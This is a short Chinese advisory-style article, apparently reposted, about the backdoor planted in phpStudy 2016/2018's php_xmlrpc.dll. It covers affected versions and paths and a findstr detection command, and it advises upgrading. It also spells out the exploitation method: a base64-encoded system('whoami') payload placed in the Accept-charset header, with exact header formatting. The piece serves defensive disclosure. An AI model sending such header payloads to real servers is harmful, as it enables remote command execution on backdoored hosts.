PHPstudy 后门漏洞
程序员文章站
2022-05-15 10:22:12
...
PHPstudy 后门
漏洞概述
phpStudy是国内一款免费PHP调试环境的程序集成包,能用来进行PHP 环境的调试和开发。
此漏洞可被利用执行命令。
涉及版本
phpStudy2016、phpStudy2018的部分版本
后门涉及部分
后门代码存在于\ext\php_xmlrpc.dll模块中,官网版本中默认xmplrpc模块的几个初始化函数都是被设置为NULL;被植入木马后的xmplrpc模块的函数被自定义,所有请求都会经过自定义函数。
至少有2个版本:
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy20161103
php\php-5.2.17\ext\php_xmlrpc.dllphp\
php-5.4.45\ext\php_xmlrpc.dll
phpStudy20180211
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
利用方法
将要执行的命令base 64编码后写在请求包的Accept-charset中
- 注意 gzip,deflate中间逗号无空格
举例:
Accept-Encoding: gzip,deflate
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
排查方法
用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否是存在后门的版本
命令参考:
findstr /m /s /c:"@eval" *.*
实例
- url:http://host/
- 请求包如下,将命令system(‘whoami’);进行base64编码后,放入参数中进行请求。
-
whoami (查看当前身份)
-
cd (查看当前目录)
- 注意:使用请求包中自带的Accept-Encoding值时,记得将gzip,deflate逗号后的空格清空:
建议
建议用户在官方 https://www.xp.cn/ 下载安装最新版本。
参考文章
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w